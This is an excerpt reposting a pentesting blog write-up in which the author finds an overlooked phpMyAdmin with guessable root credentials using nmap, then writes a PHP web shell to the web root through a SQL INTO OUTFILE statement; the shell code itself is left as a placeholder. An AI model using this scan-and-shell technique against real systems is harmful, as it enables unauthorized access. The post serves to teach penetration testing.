Putting the MY in phpMyAdmin | SANS Pentesting Blog

Because I've used something similar to this in the past and it still works with phpMyAdmin...

WARNING: Technical content.

In this article, Tim Medin walks us through a few steps of a recent pen test he did, wherein he exploits phpMyAdmin. The best part of this write up is that he shows the mindset of a pen tester as he methodically attacks the target system step by step. In the process, he provides some good insight into exploiting PHP flaws via a MySQL instance running on a Windows target as well.

Discovery

$ nmap -sT -T3 -PS80,443,8000,8443,8800 -p 80,443,8000,8443,8080 -oA http-enum-results --script=http-enum -iL targets.txt

This nmap command does a full connect scan (-sT) at the "normal" speed (default is -T3). Web servers commonly run on port 80, 443, 8000, 8443, and 8080 and those are the ports we will use for host discovery (-PS) and examination (-p). I much prefer the -PS option over the -PN option (skip host discovery), as it gives me better insight as to the hosts that are up, instead of cluttering the output with hosts that don't exist and marking them with "Host is up". I also pass the command a file holding a list of my target servers using the -iL option.

Results

Nmap scan report for 172.16.105.194
Host is up (0.00083s latency).
PORT STATE SERVICE
80/tcp closed http
443/tcp closed https
8000/tcp closed http-alt
8080/tcp open http-proxy
| http-enum:
| /phpmyadmin/: phpMyAdmin
| /phpMyAdmin/: phpMyAdmin
|_ /PHPMyAdmin/: phpMyAdmin
8443/tcp closed https-alt

It turns out the server hosts an admin interface for a particular network-monitoring product. The installer for this product installed phpMyAdmin with easy-to-guess credentials (root/root or something, I forget). None of the admins knew that phpMyAdmin was even on the box. It was yet another example of the pen tester's best friend: the old "accidentally installed because it was bundled with something else" routine. Time to play with this new found toy! It shows them a secret way that nobody else could find. And they say sneak! Sneak? Very nice friend, oh yes My Precious, very nice...

We can use phpMyAdmin to execute arbitrary SQL. I quickly try sqlmap, but it seems that sqlmap wants injection, and not full control of all the SQL, so it gets confused. I could tweak the code, but that is no fun. I like sqlmap, but it's like a little brother. It is great to send off to do something you don't want to do, but when you really need something intense and focused done, you are going to have to do it yourself.

The obvious next step is to upload a web shell using SQL. Remember, when you paste in the shell into SQL you need to escape the single quotes (') with a backslash (\') or the SQL won't be valid. I injected some PHP shell code using the following syntax:

select '[escaped php shell code]' INTO OUTFILE 'c:\\inetpub\\wwwroot\\shell.php';

Continue reading the post, it gets very funny.